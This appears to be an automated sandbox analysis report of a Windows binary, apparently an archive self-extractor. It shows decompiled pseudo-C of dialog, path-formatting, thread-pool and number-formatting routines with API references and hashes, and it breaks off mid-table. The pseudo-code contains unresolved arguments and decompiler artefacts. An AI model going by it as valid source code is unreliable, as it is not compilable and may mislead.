    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
    • String ID: SeRestorePrivilege$SeSecurityPrivilege
    • API String ID: 3813983858-639343689
    • Opcode ID: 551e7f33454f8d798714bfea23c608f2d94f615be23a995bcf092ae29c579f72
    • Instruction ID: 9166c7fb3a7cabee53ed00afb4051038c4c64e480d7840b6c69db2faeb4d52d8
    • Opcode Fuzzy Hash: 551e7f33454f8d798714bfea23c608f2d94f615be23a995bcf092ae29c579f72
    • Instruction Fuzzy Hash: 9A31B5B1A04208AADF20EF68DC45BEE7BB8FF95314F004055F549EB242DB758A44CBA2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 61%
    			E00849C00(void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR** _a16) {
    				void* _t12;
    				void* _t16;
    				void* _t22;
    				WCHAR** _t24;
    				intOrPtr _t26;
    				void* _t27;
    				struct HWND__* _t29;
    				signed short _t30;
    
    				_t24 = _a16;
    				_t30 = _a12;
    				_t29 = _a4;
    				_t26 = _a8;
    				if(E008312D7(__edx, _t29, _t26, _t30, _t24, L"ASKNEXTVOL", 0, 0) != 0) {
    					L14:
    					__eflags = 1;
    					return 1;
    				}
    				_t27 = _t26 - 0x110;
    				if(_t27 == 0) {
    					_push( *_t24);
    					 *0x88fe38 = _t24;
    					L13:
    					SetDlgItemTextW(_t29, 0x66, ??);
    					goto L14;
    				}
    				if(_t27 != 1) {
    					L6:
    					return 0;
    				}
    				_t12 = (_t30 & 0x0000ffff) - 1;
    				if(_t12 == 0) {
    					GetDlgItemTextW(_t29, 0x66,  *( *0x88fe38), ( *0x88fe38)[1]);
    					_push(1);
    					L10:
    					EndDialog(_t29, ??);
    					goto L14;
    				}
    				_t16 = _t12 - 1;
    				if(_t16 == 0) {
    					_push(0);
    					goto L10;
    				}
    				if(_t16 == 0x65) {
    					_push(0);
    					_push(E0083B9E0(__eflags,  *( *0x88fe38)));
    					_push( *( *0x88fe38));
    					_push(E0083DA8B(0x8e));
    					_t22 = E008310B0(_t29);
    					__eflags = _t22;
    					if(_t22 == 0) {
    						goto L14;
    					}
    					_push( *( *0x88fe38));
    					goto L13;
    				}
    				goto L6;
    			}











    0x00849c01
    0x00849c06
    0x00849c0b
    0x00849c10
    0x00849c28
    0x00849cb8
    0x00849cba
    0x00000000
    0x00849cba
    0x00849c2e
    0x00849c34
    0x00849ca7
    0x00849ca9
    0x00849caf
    0x00849cb2
    0x00000000
    0x00849cb2
    0x00849c39
    0x00849c4d
    0x00000000
    0x00849c4d
    0x00849c3e
    0x00849c41
    0x00849c9d
    0x00849ca3
    0x00849c87
    0x00849c88
    0x00000000
    0x00849c88
    0x00849c43
    0x00849c46
    0x00849c85
    0x00000000
    0x00849c85
    0x00849c4b
    0x00849c56
    0x00849c5f
    0x00849c65
    0x00849c71
    0x00849c73
    0x00849c78
    0x00849c7a
    0x00000000
    0x00000000
    0x00849c81
    0x00000000
    0x00849c81
    0x00000000

    APIs
      • Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
      • Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    • EndDialog.USER32(?,00000001), ref: 00849C88
    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 00849C9D
    • SetDlgItemTextW.USER32(?,00000066,?), ref: 00849CB2
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemText$DialogWindow
    • String ID: ASKNEXTVOL
    • API String ID: 445417207-3402441367
    • Opcode ID: da30267a8d6dbb9419e0ddfb8194412ce477d87b057c05d3b4f6377723b6473a
    • Instruction ID: e173740ff9445e3b54ae4d602e5906e8826db7257b3e9842553d65301dd44072
    • Opcode Fuzzy Hash: da30267a8d6dbb9419e0ddfb8194412ce477d87b057c05d3b4f6377723b6473a
    • Instruction Fuzzy Hash: 67119633640219BFD6219F68ED89F673BE9FB87704F150010F381DB1B1C7A19A119761
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 83%
    			E0084A123(void* __ecx, void* __edx, void* __eflags, struct HWND__* _a4, intOrPtr _a8, signed short _a12, WCHAR* _a16) {
    				short _v260;
    				void* __ebx;
    				void* _t15;
    				signed short _t24;
    				struct HWND__* _t28;
    				intOrPtr _t29;
    				void* _t30;
    
    				_t24 = _a12;
    				_t29 = _a8;
    				_t28 = _a4;
    				if(E008312D7(__edx, _t28, _t29, _t24, _a16, L"GETPASSWORD1", 0, 0) != 0) {
    					L10:
    					return 1;
    				}
    				_t30 = _t29 - 0x110;
    				if(_t30 == 0) {
    					SetDlgItemTextW(_t28, 0x67, _a16);
    					goto L10;
    				}
    				if(_t30 != 1) {
    					L5:
    					return 0;
    				}
    				_t15 = (_t24 & 0x0000ffff) - 1;
    				if(_t15 == 0) {
    					GetDlgItemTextW(_t28, 0x66,  &_v260, 0x80);
    					E0083E942(_t24, 0x885c00,  &_v260);
    					E0083E98D( &_v260, 0x80);
    					_push(1);
    					L7:
    					EndDialog(_t28, ??);
    					goto L10;
    				}
    				if(_t15 == 1) {
    					_push(0);
    					goto L7;
    				}
    				goto L5;
    			}










    0x0084a12d
    0x0084a131
    0x0084a135
    0x0084a14e
    0x0084a1bd
    0x00000000
    0x0084a1bf
    0x0084a150
    0x0084a156
    0x0084a1b7
    0x00000000
    0x0084a1b7
    0x0084a15b
    0x0084a16a
    0x00000000
    0x0084a16a
    0x0084a160
    0x0084a163
    0x0084a189
    0x0084a19b
    0x0084a1a8
    0x0084a1ad
    0x0084a170
    0x0084a171
    0x00000000
    0x0084a171
    0x0084a168
    0x0084a16e
    0x00000000
    0x0084a16e
    0x00000000

    APIs
      • Part of subcall function 008312D7: GetDlgItem.USER32(00000000,00003021), ref: 0083131B
      • Part of subcall function 008312D7: SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    • EndDialog.USER32(?,00000001), ref: 0084A171
    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0084A189
    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0084A1B7
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemText$DialogWindow
    • String ID: GETPASSWORD1
    • API String ID: 445417207-3292211884
    • Opcode ID: 60e628dc2c740560091e2b6f847f412b1c0c8e785226f8325d621374c617b7f3
    • Instruction ID: 140c5816d72266807795db1d9aedff11539d2d44ffe800774b55020ea05cbcd1
    • Opcode Fuzzy Hash: 60e628dc2c740560091e2b6f847f412b1c0c8e785226f8325d621374c617b7f3
    • Instruction Fuzzy Hash: B811D632A8021CB7DB259E689D49FFB7B7CFB49710F010011FA46FA1C0C6A5AD5597A2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 70%
    			E0083B254(void* __ecx, void* __eflags, signed short* _a4, short* _a8, intOrPtr _a12) {
    				short _t10;
    				void* _t13;
    				signed int _t14;
    				short* _t20;
    				void* _t23;
    				signed short* _t27;
    				signed int _t29;
    				signed int _t31;
    
    				_t20 = _a8;
    				_t27 = _a4;
    				 *_t20 = 0;
    				_t10 = E0083B563(_t27);
    				if(_t10 == 0) {
    					_t29 = 0x5c;
    					if( *_t27 == _t29 && _t27[1] == _t29) {
    						_push(_t29);
    						_push( &(_t27[2]));
    						_t10 = E00850BB8(__ecx);
    						_pop(_t23);
    						if(_t10 != 0) {
    							_push(_t29);
    							_push(_t10 + 2);
    							_t13 = E00850BB8(_t23);
    							if(_t13 == 0) {
    								_t14 = E00852B93(_t27);
    							} else {
    								_t14 = (_t13 - _t27 >> 1) + 1;
    							}
    							asm("sbb esi, esi");
    							_t31 = _t29 & _t14;
    							E00854E1F(_t20, _t27, _t31);
    							_t10 = 0;
    							 *((short*)(_t20 + _t31 * 2)) = 0;
    						}
    					}
    					return _t10;
    				}
    				return E00833F53(_t20, _a12, L"%c:\\",  *_t27 & 0x0000ffff);
    			}











    0x0083b255
    0x0083b25c
    0x0083b261
    0x0083b264
    0x0083b26b
    0x0083b288
    0x0083b28c
    0x0083b297
    0x0083b298
    0x0083b299
    0x0083b29f
    0x0083b2a2
    0x0083b2a7
    0x0083b2a8
    0x0083b2a9
    0x0083b2b2
    0x0083b2bc
    0x0083b2b4
    0x0083b2b8
    0x0083b2b8
    0x0083b2c6
    0x0083b2c8
    0x0083b2cd
    0x0083b2d5
    0x0083b2d7
    0x0083b2d7
    0x0083b2a2
    0x00000000
    0x0083b2db
    0x00000000

    APIs
    • _swprintf.LIBCMT ref: 0083B27B
      • Part of subcall function 00833F53: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00833F66
    • _wcschr.LIBVCRUNTIME ref: 0083B299
    • _wcschr.LIBVCRUNTIME ref: 0083B2A9
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: _wcschr$__vswprintf_c_l_swprintf
    • String ID: %c:\
    • API String ID: 525462905-3142399695
    • Opcode ID: e8b5eed57a33a3a5c029da6407cde61b8453bfe1851e0ed336fc7cdda3546734
    • Instruction ID: df34fe925fc72c0bc9ad4882215e08b1d23e8ec795eea35f094e6b9b15306323
    • Opcode Fuzzy Hash: e8b5eed57a33a3a5c029da6407cde61b8453bfe1851e0ed336fc7cdda3546734
    • Instruction Fuzzy Hash: 0201F5A35003116A9A20AB698C86D6FA7ACFEC53B0F90851AFE54C6081FF60D854C2E2
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 74%
    			E0084033D(long* __ecx, long _a4) {
    				void* __esi;
    				void* __ebp;
    				long _t11;
    				void* _t14;
    				long _t23;
    				long* _t25;
    
    				_t19 = __ecx;
    				_t11 = _a4;
    				_t25 = __ecx;
    				_t23 = 0x20;
    				 *__ecx = _t11;
    				if(_t11 > _t23) {
    					 *__ecx = _t23;
    				}
    				if( *_t25 == 0) {
    					 *_t25 = 1;
    				}
    				_t25[0x21] = 0;
    				if( *_t25 > _t23) {
    					 *_t25 = _t23;
    				}
    				_t3 =  &(_t25[0x68]); // 0x1a0
    				_t25[0x65] = 0;
    				InitializeCriticalSection(_t3);
    				_t25[0x66] = CreateSemaphoreW(0, 0, _t23, 0);
    				_t14 = CreateEventW(0, 1, 1, 0);
    				_t25[0x67] = _t14;
    				if(_t25[0x66] == 0 || _t14 == 0) {
    					_push(L"\nThread pool initialization failed.");
    					_push(0x8700e0);
    					E00836DE3(E00836DE8(_t19), 0x8700e0, _t25, 2);
    				}
    				_t25[0x63] = 0;
    				_t25[0x64] = 0;
    				_t25[0x22] = 0;
    				return _t25;
    			}









    0x0084033d
    0x0084033d
    0x00840345
    0x00840349
    0x0084034a
    0x0084034e
    0x00840350
    0x00840350
    0x00840359
    0x0084035b
    0x0084035b
    0x0084035d
    0x00840365
    0x00840367
    0x00840367
    0x00840369
    0x0084036f
    0x00840376
    0x0084038a
    0x00840390
    0x00840396
    0x008403a2
    0x008403a8
    0x008403b2
    0x008403be
    0x008403be
    0x008403c4
    0x008403cc
    0x008403d2
    0x008403db

    APIs
    • InitializeCriticalSection.KERNEL32(000001A0,00000000,?,?,?,0083A909,00000008,00000000,?,?,0083C89F,?,00000000,?,00000001,?), ref: 00840376
    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000020,00000000,?,?,?,0083A909,00000008,00000000,?,?,0083C89F,?,00000000), ref: 00840380
    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0083A909,00000008,00000000,?,?,0083C89F,?,00000000), ref: 00840390
    Strings
    • Thread pool initialization failed., xrefs: 008403A8
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: Create$CriticalEventInitializeSectionSemaphore
    • String ID: Thread pool initialization failed.
    • API String ID: 3340455307-2182114853
    • Opcode ID: 065dd4b3758e60ce2432c9ab479f6c586f45de99170bac097d9a16365f2710d9
    • Instruction ID: a634be4c6aa188f0d32a91c37af08ebbd28543419588ab596b011cb6c818c177
    • Opcode Fuzzy Hash: 065dd4b3758e60ce2432c9ab479f6c586f45de99170bac097d9a16365f2710d9
    • Instruction Fuzzy Hash: DC1130B1600B08AFD3305F699C85AABFBECFB55355F11482EE2DEC2250DA716880CF61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E0084C9C4(long _a4, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
    				long _v0;
    				_Unknown_base(*)()* _t16;
    				int _t22;
    				WCHAR* _t25;
    
    				 *0x88ce10 = _a12;
    				 *0x88ce14 = _a16;
    				 *0x8775f4 = _a20;
    				if( *0x8775f0 == 0) {
    					if( *0x8775cf == 0) {
    						_t16 = E0084B014;
    						_t25 = L"REPLACEFILEDLG";
    						while(1) {
    							_t22 = DialogBoxParamW( *0x870064, _t25,  *0x8775e8, _t16, _a4);
    							if(_t22 != 4) {
    								break;
    							}
    							if(DialogBoxParamW( *0x870060, L"RENAMEDLG",  *0x8775c8, E0084C2FD, _v0) != 0) {
    								break;
    							}
    						}
    						return _t22;
    					}
    					return 1;
    				}
    				return 0;
    			}







    0x0084c9cf
    0x0084c9d8
    0x0084c9e1
    0x0084c9e6
    0x0084c9f3
    0x0084ca04
    0x0084ca09
    0x0084ca30
    0x0084ca44
    0x0084ca49
    0x00000000
    0x00000000
    0x0084ca2e
    0x00000000
    0x00000000
    0x0084ca2e
    0x00000000
    0x0084ca50
    0x00000000
    0x0084c9f7
    0x00000000

    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID:
    • String ID: RENAMEDLG$REPLACEFILEDLG
    • API String ID: 0-56093855
    • Opcode ID: 88aac3019fc7c4ff2a7a3cee028d7ad0bc8cf3a6bb88b756e2ee520c91a8148d
    • Instruction ID: 42b32e69a12d23d2d6ae86c083b476a4cde59e4518a1272f7542ae51ba8bfff1
    • Opcode Fuzzy Hash: 88aac3019fc7c4ff2a7a3cee028d7ad0bc8cf3a6bb88b756e2ee520c91a8148d
    • Instruction Fuzzy Hash: 82015EB260922DABC741DB58EC48E16BBDDF745394F010426F555E2234D272D854DB61
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E008312D7(void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a20, signed int _a28) {
    				struct HWND__* _t20;
    				struct HWND__* _t21;
    
    				if(_a8 == 0x30) {
    					E0083D72D(0x870078, _a4);
    				} else {
    					_t27 = _a8 - 0x110;
    					if(_a8 == 0x110) {
    						E0083D754(0x870078, _t27, _a4, _a20, _a28 & 1);
    						if((_a28 & 0x00000001) != 0) {
    							_t20 =  *0x86dfd4(_a4);
    							if(_t20 != 0) {
    								_t21 = GetDlgItem(_t20, 0x3021);
    								if(_t21 != 0 && (_a28 & 0x00000008) != 0) {
    									SetWindowTextW(_t21, 0x8622e4);
    								}
    							}
    						}
    					}
    				}
    				return 0;
    			}





    0x008312de
    0x00831341
    0x008312e0
    0x008312e0
    0x008312e7
    0x008312fd
    0x00831306
    0x0083130b
    0x00831313
    0x0083131b
    0x00831323
    0x00831331
    0x00831331
    0x00831323
    0x00831313
    0x00831306
    0x008312e7
    0x00831349

    APIs
      • Part of subcall function 0083D754: _swprintf.LIBCMT ref: 0083D77A
      • Part of subcall function 0083D754: _strlen.LIBCMT ref: 0083D79B
      • Part of subcall function 0083D754: SetDlgItemTextW.USER32(?,0086D154,?), ref: 0083D7FB
      • Part of subcall function 0083D754: GetWindowRect.USER32(?,?), ref: 0083D835
      • Part of subcall function 0083D754: GetClientRect.USER32(?,?), ref: 0083D841
    • GetDlgItem.USER32(00000000,00003021), ref: 0083131B
    • SetWindowTextW.USER32(00000000,008622E4), ref: 00831331
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.202233566.0000000000831000.00000020.00020000.sdmp, Offset: 00830000, based on PE: true
    • Associated: 00000000.00000002.202224337.0000000000830000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202260761.0000000000862000.00000002.00020000.sdmp Download File
    • Associated: 00000000.00000002.202274857.000000000086D000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202282448.0000000000874000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202289620.0000000000890000.00000004.00020000.sdmp Download File
    • Associated: 00000000.00000002.202295830.0000000000891000.00000002.00020000.sdmp Download File
    Similarity
    • API ID: ItemRectTextWindow$Client_strlen_swprintf
    • String ID: 0$0Z
    • API String ID: 2622349952-1378374853
    • Opcode ID: fecae7eacc383649d3979680c4740dc0e9c396aa8063fdf6de1c006152a9083b
    • Instruction ID: 295b3accd763a0b3e1740067a095fd88d31943579b9c102fbbc4a77971f53d65
    • Opcode Fuzzy Hash: fecae7eacc383649d3979680c4740dc0e9c396aa8063fdf6de1c006152a9083b
    • Instruction Fuzzy Hash: 4AF0AF70580348ABDF250F609C8DAE93B99FB94784F049014FD89D16A1CFBCC894EB90
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 75%
    			E008587A4(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
    				signed int _v8;
    				signed int _v12;
    				signed int _v16;
    				unsigned int _v20;
    				signed int _v28;
    				signed int _v32;
    				signed int _v36;
    				char _v40;
    				intOrPtr _v48;
    				char _v52;
    				void* __ebx;
    				void* __edi;
    				void* _t86;
    				signed int _t92;
    				signed int _t93;
    				signed int _t94;
    				signed int _t100;
    				void* _t101;
    				void* _t102;
    				void* _t104;
    				void* _t107;
    				void* _t109;
    				void* _t111;
    				void* _t115;
    				char* _t116;
    				void* _t119;
    				signed int _t121;
    				signed int _t128;
    				signed int* _t129;
    				signed int _t136;
    				signed int _t137;
    				char _t138;
    				signed int _t139;
    				signed int _t142;
    				signed int _t146;
    				signed int _t151;
    				char _t156;
    				char _t157;
    				void* _t161;
    				unsigned int _t162;
    				signed int _t164;
    				signed int _t166;
    				signed int _t170;
    				void* _t171;
    				signed int* _t172;
    				signed int _t174;
    				signed int _t181;
    				signed int _t182;
    				signed int _t183;
    				signed int _t184;
    				signed int _t185;
    				signed int _t186;
    				signed int _t187;
    
    				_t171 = __edx;
    				_t181 = _a24;
    				if(_t181 < 0) {
    					_t181 = 0;
    				}
    				_t184 = _a8;
    				 *_t184 = 0;
    				E008533B6(0,  &_v52, _t171, _a36);
    				_t5 = _t181 + 0xb; // 0xb
    				if(_a12 > _t5) {
    					_t172 = _a4;
    					_t142 = _t172[1];
    					_v36 =  *_t172;
    					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
    					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
    						L11:
    						__eflags = _t142 & 0x80000000;
    						if((_t142 & 0x80000000) != 0) {
    							 *_t184 = 0x2d;
    							_t184 = _t184 + 1;
    							__eflags = _t184;
    						}
    						__eflags = _a28;
    						_v16 = 0x3ff;
    						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
    						__eflags = _t172[1] & 0x7ff00000;
    						_v32 = _t136;
    						_t86 = 0x30;
    						if((_t172[1] & 0x7ff00000) != 0) {
    							 *_t184 = 0x31;
    							_t185 = _t184 + 1;
    							__eflags = _t185;
    						} else {
    							 *_t184 = _t86;
    							_t185 = _t184 + 1;
    							_t164 =  *_t172 | _t172[1] & 0x000fffff;
    							__eflags = _t164;
    							if(_t164 != 0) {
    								_v16 = 0x3fe;
    							} else {
    								_v16 = _v16 & _t164;
    							}
    						}
    						_t146 = _t185;
    						_t186 = _t185 + 1;
    						_v28 = _t146;
    						__eflags = _t181;
    						if(_t181 != 0) {
    							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_v48 + 0x88))))));
    						} else {
    							 *_t146 = 0;
    						}
    						_t92 = _t172[1] & 0x000fffff;
    						__eflags = _t92;
    						_v20 = _t92;
    						if(_t92 > 0) {
    							L23:
    							_t33 =  &_v8;
    							 *_t33 = _v8 & 0x00000000;
    							__eflags =  *_t33;
    							_t147 = 0xf0000;
    							_t93 = 0x30;
    							_v12 = _t93;
    							_v20 = 0xf0000;
    							do {
    								__eflags = _t181;
    								if(_t181 <= 0) {
    									break;
    								}
    								_t119 = E0084DB40( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
    								_t161 = 0x30;
    								_t121 = _t119 + _t161 & 0x0000ffff;
    								__eflags = _t121 - 0x39;
    								if(_t121 > 0x39) {
    									_t121 = _t121 + _t136;
    									__eflags = _t121;
    								}
    								_t162 = _v20;
    								_t172 = _a4;
    								 *_t186 = _t121;
    								_t186 = _t186 + 1;
    								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
    								_t147 = _t162 >> 4;
    								_t93 = _v12 - 4;
    								_t181 = _t181 - 1;
    								_v20 = _t162 >> 4;
    								_v12 = _t93;
    								__eflags = _t93;
    							} while (_t93 >= 0);
    							__eflags = _t93;
    							if(_t93 < 0) {
    								goto L39;
    							}
    							_t115 = E0084DB40( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
    							__eflags = _t115 - 8;
    							if(_t115 <= 8) {
    								goto L39;
    							}
    							_t54 = _t186 - 1; // 0x854021
    							_t116 = _t54;
    							_t138 = 0x30;
    							while(1) {
    								_t156 =  *_t116;
    								__eflags = _t156 - 0x66;
    								if(_t156 == 0x66) {
    									goto L33;
    								}
    								__eflags = _t156 - 0x46;
    								if(_t156 != 0x46) {
    									_t139 = _v32;
    									__eflags = _t116 - _v28;
    									if(_t116 == _v28) {
    										_t57 = _t116 - 1;
    										 *_t57 =  *(_t116 - 1) + 1;
    										__eflags =  *_t57;
    									} else {
    										_t157 =  *_t116;
    										__eflags = _t157 - 0x39;
    										if(_t157 != 0x39) {
    											 *_t116 = _t157 + 1;
    										} else {
    											 *_t116 = _t139 + 0x3a;
    										}
    									}
    									goto L39;
    								}
    								L33:
    								 *_t116 = _t138;
    								_t116 = _t116 - 1;
    							}
    						} else {
    							__eflags =  *_t172;
    							if( *_t172 <= 0) {
    								L39:
    								__eflags = _t181;
    								if(_t181 > 0) {
    									_push(_t181);
    									_t111 = 0x30;
    									_push(_t111);
    									_push(_t186);
    									E0084E920(_t181);
    									_t186 = _t186 + _t181;
    									__eflags = _t186;
    								}
    								_t94 = _v28;
    								__eflags =  *_t94;
    								if( *_t94 == 0) {
    									_t186 = _t94;
    								}
    								__eflags = _a28;
    								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								_t174 = _a4[1];
    								_t100 = E0084DB40( *_a4, 0x34, _t174);
    								_t137 = 0;
    								_t151 = (_t100 & 0x000007ff) - _v16;
    								__eflags = _t151;
    								asm("sbb ebx, ebx");
    								if(__eflags < 0) {
    									L47:
    									 *(_t186 + 1) = 0x2d;
    									_t187 = _t186 + 2;
    									__eflags = _t187;
    									_t151 =  ~_t151;
    									asm("adc ebx, 0x0");
    									_t137 =  ~_t137;
    									goto L48;
    								} else {
    									if(__eflags > 0) {
    										L46:
    										 *(_t186 + 1) = 0x2b;
    										_t187 = _t186 + 2;
    										L48:
    										_t182 = _t187;
    										_t101 = 0x30;
    										 *_t187 = _t101;
    										__eflags = _t137;
    										if(__eflags < 0) {
    											L56:
    											__eflags = _t187 - _t182;
    											if(_t187 != _t182) {
    												L60:
    												_push(0);
    												_push(0xa);
    												_push(_t137);
    												_push(_t151);
    												_t102 = E0084DE40();
    												_v32 = _t174;
    												 *_t187 = _t102 + 0x30;
    												_t187 = _t187 + 1;
    												__eflags = _t187;
    												L61:
    												_t104 = 0x30;
    												_t183 = 0;
    												__eflags = 0;
    												 *_t187 = _t151 + _t104;
    												 *(_t187 + 1) = 0;
    												goto L62;
    											}
    											__eflags = _t137;
    											if(__eflags < 0) {
    												goto L61;
    											}
    											if(__eflags > 0) {
    												goto L60;
    											}
    											__eflags = _t151 - 0xa;
    											if(_t151 < 0xa) {
    												goto L61;
    											}
    											goto L60;
    										}
    										if(__eflags > 0) {
    											L51:
    											_push(0);
    											_push(0x3e8);
    											_push(_t137);
    											_push(_t151);
    											_t107 = E0084DE40();
    											_v32 = _t174;
    											 *_t187 = _t107 + 0x30;
    											_t187 = _t187 + 1;
    											__eflags = _t187 - _t182;
    											if(_t187 != _t182) {
    												L55:
    												_push(0);
    												_push(0x64);
    												_push(_t137);
    												_push(_t151);
    												_t109 = E0084DE40();
    												_v32 = _t174;
    												 *_t187 = _t109 + 0x30;
    												_t187 = _t187 + 1;
    												__eflags = _t187;
    												goto L56;
    											}
    											L52:
    											__eflags = _t137;
    											if(__eflags < 0) {
    												goto L56;
    											}
    											if(__eflags > 0) {
    												goto L55;
    											}
    											__eflags = _t151 - 0x64;
    											if(_t151 < 0x64) {
    												goto L56;
    											}
    											goto L55;
    										}
    										__eflags = _t151 - 0x3e8;
    										if(_t151 < 0x3e8) {
    											goto L52;
    										}
    										goto L51;
    									}
    									__eflags = _t151;
    									if(_t151 < 0) {
    										goto L47;
    									}
    									goto L46;
    								}
    							}
    							goto L23;
    						}
    					}
    					__eflags = 0;
    					if(0 != 0) {
    						goto L11;
    					} else {
    						_t183 = E00858AA7(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
    						__eflags = _t183;
    						if(_t183 == 0) {
    							_t128 = E00861020(_t184, 0x65);
    							_pop(_t166);
    							__eflags = _t128;
    							if(_t128 != 0) {
    								__eflags = _a28;
    								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
    								__eflags = _t170;
    								 *_t128 = _t170;
    								 *((char*)(_t128 + 3)) = 0;
    							}
    							_t183 = 0;
    						} else {
    							 *_t184 = 0;
    						}
    						goto L62;
    					}
    				} else {
    					_t129 = E00857F42();
    					_t183 = 0x22;
    					 *_t129 = _t183;
    					E00857E21();
    					L62:
    					if(_v40 != 0) {
    						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
    					}
    					return _t183;
    				}
    			}
























































    0x008587a4
    0x008587af
    0x008587b6
    0x008587b8
    0x008587b8
    0x008587ba
    0x008587c3
    0x008587c5
    0x008587ca
    0x008587d0
    0x008587e6
    0x008587eb
    0x008587ee
